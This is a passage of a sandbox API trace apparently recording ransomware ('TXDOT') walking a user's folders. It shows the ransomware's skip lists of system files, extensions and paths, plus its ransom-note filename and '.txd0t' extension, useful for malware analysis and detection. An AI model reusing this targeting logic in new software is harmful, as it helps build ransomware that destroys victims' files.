(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.319] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.319] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.319] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.325] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.326] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg" [0076.326] SetEvent (hEvent=0x410) returned 1 [0076.326] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe868d20, ftCreationTime.dwHighDateTime=0x1d5e6d1, ftLastAccessTime.dwLowDateTime=0x71777220, ftLastAccessTime.dwHighDateTime=0x1d5e7e8, ftLastWriteTime.dwLowDateTime=0x71777220, ftLastWriteTime.dwHighDateTime=0x1d5e7e8, nFileSizeHigh=0x0, nFileSizeLow=0x18245, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="wI6_mSLtm0QHgo.gif", cAlternateFileName="WI6_MS~1.GIF")) returned 1 [0076.326] StrCmpW (psz1="wI6_mSLtm0QHgo.gif", psz2=".") returned 1 [0076.326] StrCmpW (psz1="wI6_mSLtm0QHgo.gif", psz2="..") returned 1 [0076.326] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.326] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="wI6_mSLtm0QHgo.gif", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif") returned="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" [0076.326] PathFindExtensionW (pszPath="wI6_mSLtm0QHgo.gif") returned=".gif" [0076.327] StrCmpW (psz1=".gif", psz2=".txd0t") returned -1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="bootsect.bak") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="iconcache.db") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="thumbs.db") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2=" ransomware ") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2=" ransom ") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="debug.txt") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="boot.ini") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="desktop.ini") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="autorun.inf") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="ntuser.dat") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="ntldr") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="ntdetect.com") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="bootfont.bin") returned 1 [0076.327] StrCmpIW (psz1="wI6_mSLtm0QHgo.gif", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.327] PathFindExtensionW (pszPath="wI6_mSLtm0QHgo.gif") returned=".gif" [0076.327] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".gif") returned 0x0 [0076.327] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.327] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.328] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.335] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.335] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif" [0076.335] SetEvent (hEvent=0x418) returned 1 [0076.335] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc99ffe0, ftCreationTime.dwHighDateTime=0x1d5ece6, ftLastAccessTime.dwLowDateTime=0x899e87d0, ftLastAccessTime.dwHighDateTime=0x1d5e59a, ftLastWriteTime.dwLowDateTime=0x899e87d0, ftLastWriteTime.dwHighDateTime=0x1d5e59a, nFileSizeHigh=0x0, nFileSizeLow=0xf7f6, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="x7M0JVNEgkR8AAFTEXtY.jpg", cAlternateFileName="X7M0JV~1.JPG")) returned 1 [0076.335] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2=".") returned 1 [0076.335] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="..") returned 1 [0076.335] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.335] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.335] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="x7M0JVNEgkR8AAFTEXtY.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" [0076.335] PathFindExtensionW (pszPath="x7M0JVNEgkR8AAFTEXtY.jpg") returned=".jpg" [0076.335] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.335] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="bootsect.bak") returned 1 [0076.335] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="iconcache.db") returned 1 [0076.335] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="thumbs.db") returned 1 [0076.335] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2=" ransomware ") returned 1 [0076.335] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2=" ransom ") returned 1 [0076.335] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="debug.txt") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="boot.ini") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="desktop.ini") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="autorun.inf") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="ntuser.dat") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="ntldr") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="ntdetect.com") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="bootfont.bin") returned 1 [0076.336] StrCmpIW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.336] PathFindExtensionW (pszPath="x7M0JVNEgkR8AAFTEXtY.jpg") returned=".jpg" [0076.336] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.336] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.336] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.336] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0076.343] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.343] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\x7M0JVNEgkR8AAFTEXtY.jpg" [0076.343] SetEvent (hEvent=0x410) returned 1 [0076.343] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c31360, ftCreationTime.dwHighDateTime=0x1d5eac7, ftLastAccessTime.dwLowDateTime=0x9f0a2830, ftLastAccessTime.dwHighDateTime=0x1d5ef9b, ftLastWriteTime.dwLowDateTime=0x9f0a2830, ftLastWriteTime.dwHighDateTime=0x1d5ef9b, nFileSizeHigh=0x0, nFileSizeLow=0x6b2f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Xej8a4-yl4uAkyUIiU1.jpg", cAlternateFileName="XEJ8A4~1.JPG")) returned 1 [0076.343] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2=".") returned 1 [0076.343] StrCmpW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="..") returned 1 [0076.343] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0076.343] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0076.344] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Xej8a4-yl4uAkyUIiU1.jpg", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg") returned="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" [0076.344] PathFindExtensionW (pszPath="Xej8a4-yl4uAkyUIiU1.jpg") returned=".jpg" [0076.344] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="bootsect.bak") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="iconcache.db") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="thumbs.db") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2=" ransomware ") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2=" ransom ") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="debug.txt") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="boot.ini") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="desktop.ini") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="autorun.inf") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="ntuser.dat") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="ntldr") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="ntdetect.com") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="bootfont.bin") returned 1 [0076.344] StrCmpIW (psz1="Xej8a4-yl4uAkyUIiU1.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.344] PathFindExtensionW (pszPath="Xej8a4-yl4uAkyUIiU1.jpg") returned=".jpg" [0076.344] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0076.344] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.344] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.344] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0076.353] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.353] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\Xej8a4-yl4uAkyUIiU1.jpg" [0076.353] SetEvent (hEvent=0x418) returned 1 [0076.353] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30c31360, ftCreationTime.dwHighDateTime=0x1d5eac7, ftLastAccessTime.dwLowDateTime=0x9f0a2830, ftLastAccessTime.dwHighDateTime=0x1d5ef9b, ftLastWriteTime.dwLowDateTime=0x9f0a2830, ftLastWriteTime.dwHighDateTime=0x1d5ef9b, nFileSizeHigh=0x0, nFileSizeLow=0x6b2f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Xej8a4-yl4uAkyUIiU1.jpg", cAlternateFileName="XEJ8A4~1.JPG")) returned 0 [0076.353] FindClose (in: hFindFile=0xec27f0 | out: hFindFile=0xec27f0) returned 1 [0076.353] GetProcessHeap () returned 0xe30000 [0076.353] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0076.353] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0076.353] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0076.354] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0076.354] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0076.354] StrCmpW (psz1="Recent", psz2=".") returned 1 [0076.354] StrCmpW (psz1="Recent", psz2="..") returned 1 [0076.354] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0076.354] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0076.354] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0076.354] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0076.354] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0076.354] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Saved Games", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="ransomware") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0076.354] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.355] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0076.355] GetProcessHeap () returned 0xe30000 [0076.355] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xed0058 [0076.355] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Saved Games", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games") returned="C:\\Users\\FD1HVy\\Saved Games" [0076.355] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Saved Games", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Saved Games\\*") returned="C:\\Users\\FD1HVy\\Saved Games\\*" [0076.355] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2070 [0076.355] StrCmpW (psz1=".", psz2=".") returned 0 [0076.355] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd45b644a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.355] StrCmpW (psz1="..", psz2=".") returned 1 [0076.355] StrCmpW (psz1="..", psz2="..") returned 0 [0076.355] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.355] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0076.355] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0076.355] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x441f699e, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x441f699e, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce4e13d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.355] FindClose (in: hFindFile=0xec2070 | out: hFindFile=0xec2070) returned 1 [0076.355] GetProcessHeap () returned 0xe30000 [0076.355] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0076.355] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd462426d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0076.355] StrCmpW (psz1="Searches", psz2=".") returned 1 [0076.355] StrCmpW (psz1="Searches", psz2="..") returned 1 [0076.355] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0076.355] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0076.355] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Searches", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Searches") returned="C:\\Users\\FD1HVy\\Searches" [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system32\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\system\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\local\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\boot\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\perflogs\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\programdata\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\drivers\\") returned 0x0 [0076.356] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Searches", lpSrch=":\\wsus\\") returned 0x0 [0076.356] StrStrIW 